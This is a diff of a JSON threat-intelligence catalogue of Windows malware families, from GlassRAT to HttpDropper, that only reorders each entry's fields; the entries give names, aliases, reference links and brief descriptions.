"https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c", - "value": "GlassRAT", - "description": "" + "value": "GlassRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter", "https://blog.ensilo.com/globeimposter-ransomware-technical", @@ -7094,41 +7096,41 @@ "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", "https://isc.sans.edu/diary/23417" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "73806c57-cef8-4f7b-a78b-7949ef83b2c2", - "value": "GlobeImposter", - "description": "" + "value": "GlobeImposter" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "de8e204c-fb65-447e-92bd-200e1c39648c", - "value": "Globe", - "description": "" + "value": "Globe" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370", - "value": "GlooxMail", - "description": "" + "value": "GlooxMail" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", @@ -7136,129 +7138,126 @@ "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/", "http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/", "http://resources.infosecinstitute.com/tdss4-part-1/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c", - "value": "win.glupteba", - "description": "" + "value": "win.glupteba" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9cfdc3ea-c838-4ac5-bff2-57c92ec24b48", - "value": "Godzilla Loader", - "description": "" + "value": "Godzilla Loader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2", - "value": "Goggles", - "description": "" + "value": "Goggles" }, { + "description": "", "meta": { - "synonyms": [ - "Petya/Mischa" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye", "http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html", "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" - ] + ], + "synonyms": [ + "Petya/Mischa" + ], + "type": [] }, "uuid": "d7196f6a-757b-4124-ae28-f403e5d84fcb", - "value": "GoldenEye", - "description": "" + "value": "GoldenEye" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2297799c-f93c-4903-b9af-32b6b599912c", - "value": "GoldDragon", - "description": "" + "value": "GoldDragon" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.golroted", "http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d", - "value": "Golroted", - "description": "" + "value": "Golroted" }, { + "description": "", "meta": { - "synonyms": [ - "Fuerboos" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor", "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" - ] + ], + "synonyms": [ + "Fuerboos" + ], + "type": [] }, "uuid": "91b52a5f-420a-484b-8e1e-a91d402db6c5", - "value": "Goodor", - "description": "" + "value": "Goodor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat", "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d1298818-6425-49be-9764-9f119d964efd", - "value": "GoogleDrive RAT", - "description": "" + "value": "GoogleDrive RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic", "https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1ebb6107-f97b-45f6-ae81-a671ac437181", - "value": "GooPic Drooper", - "description": "" + "value": "GooPic Drooper" }, { + "description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks.", "meta": { - "synonyms": [ - "talalpek", - "Xswkit" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit", "https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/", @@ -7277,35 +7276,32 @@ "https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/", "https://www.youtube.com/watch?v=QgUlPvEE4aw", "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055" - ] + ], + "synonyms": [ + "talalpek", + "Xswkit" + ], + "type": [] }, "uuid": "329efac7-922e-4d8b-90a9-4a87c3281753", - "value": "GootKit", - "description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks." + "value": "GootKit" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat", "https://www.yumpu.com/en/document/view/55930175/govrat-v20" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9fbb5822-1660-4651-9f57-b6f83a881786", - "value": "GovRAT", - "description": "" + "value": "GovRAT" }, { + "description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.", "meta": { - "synonyms": [ - "CRM", - "Gozi CRM", - "Papras", - "Snifula", - "Ursnif" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", @@ -7313,16 +7309,22 @@ "https://www.secureworks.com/research/gozi", "https://lokalhost.pl/gozi_tree.txt", "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html" - ] + ], + "synonyms": [ + "CRM", + "Gozi CRM", + "Papras", + "Snifula", + "Ursnif" + ], + "type": [] }, "uuid": "75329c9e-a218-4299-87b2-8f667cd9e40c", - "value": "Gozi", - "description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module." + "value": "Gozi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode", "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2", @@ -7330,182 +7332,180 @@ "https://de.securelist.com/analysis/59479/erpresser/", "ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html", "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "127c3d76-6323-4363-93e0-cd06ade0dd52", - "value": "GPCode", - "description": "" + "value": "GPCode" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot", "http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0092b005-b032-4e34-9c7e-7dd0e71a85fb", - "value": "GrabBot", - "description": "" + "value": "GrabBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor", "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf", - "value": "Graftor", - "description": "" + "value": "Graftor" }, { + "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", "meta": { - "synonyms": [ - "FrameworkPOS", - "trinity" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season" - ] + ], + "synonyms": [ + "FrameworkPOS", + "trinity" + ], + "type": [] }, "uuid": "f82f8d2c-695e-461a-bd4f-a7dc58531063", - "value": "Grateful POS", - "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past." + "value": "Grateful POS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem", "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8", - "value": "Gratem", - "description": "" + "value": "Gratem" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat", "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", - "value": "Gravity RAT", - "description": "" + "value": "Gravity RAT" }, { + "description": "", "meta": { - "synonyms": [ - "eoehttp" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan", "https://blog.cylance.com/spear-a-threat-actor-resurfaces" - ] + ], + "synonyms": [ + "eoehttp" + ], + "type": [] }, "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", - "value": "GreenShaitan", - "description": "" + "value": "GreenShaitan" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok", "https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", - "value": "GROK", - "description": "" + "value": "GROK" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump", "https://attack.mitre.org/wiki/Technique/T1003" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8410d208-7450-407d-b56c-e5c1ced19632", - "value": "gsecdump", - "description": "" + "value": "gsecdump" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1", "https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3", - "value": "H1N1 Loader", - "description": "" + "value": "H1N1 Loader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2713a763-33fa-45ce-8552-7dd12b6b8ecc", - "value": "Hacksfase", - "description": "" + "value": "Hacksfase" }, { + "description": "Py2Exe based tool as found on github.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hackspy", "https://github.com/ratty3697/HackSpy-Trojan-Exploit" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", - "value": "HackSpy", - "description": "Py2Exe based tool as found on github." + "value": "HackSpy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq", "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "454fc9f7-b328-451f-806c-68ff5bcd491e", - "value": "Hamweq", - "description": "" + "value": "Hamweq" }, { + "description": "", "meta": { - "synonyms": [ - "Chanitor" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", "http://www.morphick.com/resources/lab-blog/closer-look-hancitor", @@ -7517,59 +7517,59 @@ "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak" - ] + ], + "synonyms": [ + "Chanitor" + ], + "type": [] }, "uuid": "4166ab63-24b0-4448-92ea-21c8deef978d", - "value": "Hancitor", - "description": "" + "value": "Hancitor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9", - "value": "HappyLocker (HiddenTear?)", - "description": "" + "value": "HappyLocker (HiddenTear?)" }, { + "description": "", "meta": { - "synonyms": [ - "Piptea" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig", "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html", "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html" - ] + ], + "synonyms": [ + "Piptea" + ], + "type": [] }, "uuid": "619b9665-dac2-47a8-bf7d-942809439c12", - "value": "Harnig", - "description": "" + "value": "Harnig" }, { + "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat", "https://www.f-secure.com/weblog/archives/00002718.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a", - "value": "Havex RAT", - "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries." + "value": "Havex RAT" }, { + "description": "", "meta": { - "synonyms": [ - "Predator Pain" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", @@ -7578,344 +7578,344 @@ "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/", "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/" - ] + ], + "synonyms": [ + "Predator Pain" + ], + "type": [] }, "uuid": "31615066-dbff-4134-b467-d97a337b408b", - "value": "HawkEye Keylogger", - "description": "" + "value": "HawkEye Keylogger" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f", - "value": "Helauto", - "description": "" + "value": "Helauto" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "19d89300-ff97-4281-ac42-76542e744092", - "value": "Helminth", - "description": "" + "value": "Helminth" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag", "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/", "https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bb07e153-2e51-4ce1-97a3-4ec8a936e625", - "value": "Heloag", - "description": "" + "value": "Heloag" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst", "https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ca8482d9-657b-49fe-8345-6ed962a9735a", - "value": "Herbst", - "description": "" + "value": "Herbst" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9d4fc43c-28a1-45ea-ac2c-8d53bdce118b", - "value": "Heriplor", - "description": "" + "value": "Heriplor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes", "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "30a230c1-b598-4d06-90ab-3254d6a626d8", - "value": "Hermes", - "description": "" + "value": "Hermes" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4d8da0af-cfd7-4990-b211-af0e9906eca0", - "value": "Hermes Ransomware", - "description": "" + "value": "Hermes Ransomware" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4734c5a4-e63b-4bb4-8c01-ab0c638a6c21", - "value": "HerpesBot", - "description": "" + "value": "HerpesBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2637315d-d31e-4b64-aa4b-2fc265b0a1a3", - "value": "HesperBot", - "description": "" + "value": "HesperBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", "https://github.com/goliate/hidden-tear", "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", "https://twitter.com/struppigel/status/950787783353884672" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b96be762-56a0-4407-be04-fcba76c1ff29", - "value": "HiddenTear", - "description": "" + "value": "HiddenTear" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "84b30881-00bc-4206-8170-51705a8e26b1", - "value": "HideDRV", - "description": "" + "value": "HideDRV" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit", "https://www.recordedfuture.com/hidden-lynx-analysis/", "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1", - "value": "HiKit", - "description": "" + "value": "HiKit" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan", "https://www.checkpoint.com/threatcloud-central/downloads/check-point-himan-malware-analysis.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ecad37b9-555a-4029-b181-6f272eed7154", - "value": "himan", - "description": "" + "value": "himan" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat", "https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "80987ce7-7eb7-4e55-95f8-5c7a9441acab", - "value": "Hi-Zor RAT", - "description": "" + "value": "Hi-Zor RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62", - "value": "HLUX", - "description": "" + "value": "HLUX" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", - "value": "homefry", - "description": "" + "value": "homefry" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "246f62ee-854a-45e9-8c57-34f1fb72762f", - "value": "HtBot", - "description": "" + "value": "HtBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat", "https://www.riskiq.com/blog/labs/htprat/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e8d1a1f3-3170-4562-9a18-cadf000e48d0", - "value": "htpRAT", - "description": "" + "value": "htpRAT" }, { + "description": "", "meta": { - "synonyms": [ - "HUC Packet Transmit Tool" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran", "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", "https://www.secureworks.com/research/htran" - ] + ], + "synonyms": [ + "HUC Packet Transmit Tool" + ], + "type": [] }, "uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8", - "value": "HTran", - "description": "" + "value": "HTran" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser", "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f", - "value": "HttpBrowser", - "description": "" + "value": "HttpBrowser" }, { + "description": "", "meta": { - "synonyms": [ - "httpdr0pper" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf", "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787" 